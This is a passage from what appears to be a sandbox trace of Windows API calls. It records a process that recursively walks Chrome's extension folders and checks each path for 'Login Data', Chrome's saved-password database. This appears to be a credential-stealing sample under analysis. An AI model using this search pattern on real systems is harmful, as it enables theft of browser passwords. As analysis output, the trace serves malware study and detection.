HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\") returned 136 [0161.650] lstrlenW (lpString="computed_hashes.json") returned 20 [0161.650] GetProcessHeap () returned 0x8e0000 [0161.650] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x13a) returned 0x925de0 [0161.650] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\" [0161.650] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\", lpString2="computed_hashes.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" [0161.650] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.650] GetProcessHeap () returned 0x8e0000 [0161.650] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.650] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json", lpSrch="Login Data") returned 0x0 [0161.650] VirtualQuery (in: lpAddress=0x925de0, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.650] GetProcessHeap () returned 0x8e0000 [0161.650] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925de0 | out: hHeap=0x8e0000) returned 1 [0161.650] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x2b56, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="verified_contents.json", cAlternateFileName="VERIFI~1.JSO")) returned 1 [0161.651] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned 135 [0161.651] lstrlenW (lpString="\\") returned 1 [0161.651] GetProcessHeap () returned 0x8e0000 [0161.651] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x112) returned 0x925cc0 [0161.651] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata" [0161.651] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\" [0161.651] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\") returned 136 [0161.651] lstrlenW (lpString="verified_contents.json") returned 22 [0161.651] GetProcessHeap () returned 0x8e0000 [0161.651] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x13e) returned 0x925de0 [0161.651] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\" [0161.651] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\", lpString2="verified_contents.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" [0161.651] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.651] GetProcessHeap () returned 0x8e0000 [0161.651] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.651] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json", lpSrch="Login Data") returned 0x0 [0161.651] VirtualQuery (in: lpAddress=0x925de0, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.651] GetProcessHeap () returned 0x8e0000 [0161.651] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925de0 | out: hHeap=0x8e0000) returned 1 [0161.651] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x2b56, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="verified_contents.json", cAlternateFileName="VERIFI~1.JSO")) returned 0 [0161.651] FindClose (in: hFindFile=0x8f9bc0 | out: hFindFile=0x8f9bc0) returned 1 [0161.651] VirtualQuery (in: lpAddress=0x925ba0, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.651] GetProcessHeap () returned 0x8e0000 [0161.651] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925ba0 | out: hHeap=0x8e0000) returned 1 [0161.651] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.651] GetProcessHeap () returned 0x8e0000 [0161.651] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0161.651] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85d166b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 0 [0161.651] FindClose (in: hFindFile=0x8f9b80 | out: hFindFile=0x8f9b80) returned 1 [0161.651] VirtualQuery (in: lpAddress=0x925978, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.651] GetProcessHeap () returned 0x8e0000 [0161.652] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925978 | out: hHeap=0x8e0000) returned 1 [0161.652] VirtualQuery (in: lpAddress=0x917cc0, lpBuffer=0x2dee24, dwLength=0x1c | out: lpBuffer=0x2dee24*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.652] GetProcessHeap () returned 0x8e0000 [0161.652] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917cc0 | out: hHeap=0x8e0000) returned 1 [0161.652] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0.9_0", cAlternateFileName="")) returned 0 [0161.652] FindClose (in: hFindFile=0x8f9b40 | out: hFindFile=0x8f9b40) returned 1 [0161.652] VirtualQuery (in: lpAddress=0x925878, lpBuffer=0x2dee24, dwLength=0x1c | out: lpBuffer=0x2dee24*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.652] GetProcessHeap () returned 0x8e0000 [0161.652] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925878 | out: hHeap=0x8e0000) returned 1 [0161.652] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.652] GetProcessHeap () returned 0x8e0000 [0161.652] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.652] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x916d8210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x916d8210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aohghmighlieiainnegkcijnfilokake", cAlternateFileName="AOHGHM~1")) returned 1 [0161.652] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2=".") returned 1 [0161.652] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="..") returned 1 [0161.652] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0161.652] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0161.652] lstrlenW (lpString="\\") returned 1 [0161.652] GetProcessHeap () returned 0x8e0000 [0161.652] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x9256c8 [0161.652] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" [0161.652] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\" [0161.652] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned 87 [0161.652] lstrlenW (lpString="aohghmighlieiainnegkcijnfilokake") returned 32 [0161.652] GetProcessHeap () returned 0x8e0000 [0161.652] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf0) returned 0x925780 [0161.652] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\" [0161.652] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\", lpString2="aohghmighlieiainnegkcijnfilokake" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake" [0161.652] VirtualQuery (in: lpAddress=0x9256c8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.652] GetProcessHeap () returned 0x8e0000 [0161.652] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c8 | out: hHeap=0x8e0000) returned 1 [0161.652] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 119 [0161.652] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 119 [0161.652] lstrlenW (lpString="\\*.*") returned 4 [0161.652] GetProcessHeap () returned 0x8e0000 [0161.653] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf8) returned 0x925878 [0161.653] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake" [0161.653] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*.*" [0161.653] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*.*", lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x916d8210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x916d8210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b40 [0161.653] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.653] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x916d8210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x916d8210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.653] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.653] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.653] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86833250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0.9_0", cAlternateFileName="")) returned 1 [0161.653] lstrcmpiW (lpString1="0.9_0", lpString2=".") returned 1 [0161.653] lstrcmpiW (lpString1="0.9_0", lpString2="..") returned 1 [0161.653] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 119 [0161.653] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 119 [0161.653] lstrlenW (lpString="\\") returned 1 [0161.653] GetProcessHeap () returned 0x8e0000 [0161.653] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf2) returned 0x925978 [0161.653] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake" [0161.653] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\" [0161.653] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\") returned 120 [0161.653] lstrlenW (lpString="0.9_0") returned 5 [0161.653] GetProcessHeap () returned 0x8e0000 [0161.653] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfc) returned 0x917cc0 [0161.653] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\" [0161.653] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\", lpString2="0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" [0161.653] VirtualQuery (in: lpAddress=0x925978, lpBuffer=0x2dee18, dwLength=0x1c | out: lpBuffer=0x2dee18*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.653] GetProcessHeap () returned 0x8e0000 [0161.653] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925978 | out: hHeap=0x8e0000) returned 1 [0161.654] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0161.654] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0161.654] lstrlenW (lpString="\\*.*") returned 4 [0161.654] GetProcessHeap () returned 0x8e0000 [0161.654] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x104) returned 0x925978 [0161.654] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" [0161.654] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\*.*" [0161.654] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\*.*", lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86833250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b80 [0161.660] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.660] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86833250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.660] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.660] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.660] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86833250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, 